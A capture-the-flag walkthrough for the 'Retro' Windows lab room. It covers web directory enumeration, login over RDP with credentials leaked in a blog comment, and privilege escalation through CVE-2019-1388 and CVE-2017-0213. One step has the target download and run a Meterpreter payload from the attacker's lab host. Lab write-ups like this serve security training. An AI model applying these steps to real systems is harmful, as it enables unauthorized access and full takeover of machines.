Retro
Last updated
Last updated
Room Info
đ Name
đ¯ Target IP
10.10.181.110
đ Difficulty level
đĸEasy
đ˛ Subscription type
Free
đĒ OS
Windows
Perform Web Server directories enumeration.
The enumeration found a folder named /retro
.
Use a browser to navigate to:
http://10.10.181.110/retro/index.php/2019/12/09/ready-player-one/
đ Wade user left a comment with his password
Use the credentials to login to the target via the open RDP Port 3389
Wade
:parzival
I suggest to set the
Remmina
RDP resolution to a higher one,e.g
Open Remmina,
+
to create a Quick RDP Connect, select the resolution andSave as Default
đŠ Open the user.txt
file on Wade's user desktop to get the first flag.
Open Internet Explorer
to initialize it.
Open Google Chrome
and set it as Default web browser in Windows.
The bookmarked link refers to the CVE-2019-1388 - Windows Certificate Dialog Elevation of Privilege Vulnerability.
Check the Recycle Bin and restore the hhupd
file.
Exploit the privesc vulnerability present in the Windows Certificate Dialog Box and run cmd
with Administrator privileges.
Even after the initialization of both the IE and Chrome browsers, there might not be any option for selecting the browser in the opened window.
Generate a manual payload to get a Metasploit Meterpreter session on the target.
Download the payload on the target browser from this link
http://10.18.65.48/unprivileged-payload.exe
Open Metasploit and set up a handler to listen on the 4444
port
Run the unprivileged-payload.exe
file on the target machine
Get systeminfo
from the target and save the output to a file.
Exploit the CVE-2017-0213 - Windows COM Elevation of Privilege Vulnerability
Download the CVE-2017-0213_x64.zip
package, unzip it and upload the CVE-2017-0213_x86.exe
to the target.
Run the CVE-2017-0213_x86.exe
file from the Meterpreter session or using the RDP connection on the target.
Check the CMD
as Administrator session on the target.
đŠ Read the root.txt
file
Remember that there can be other attack vectors to exploit target's vulnerabilities.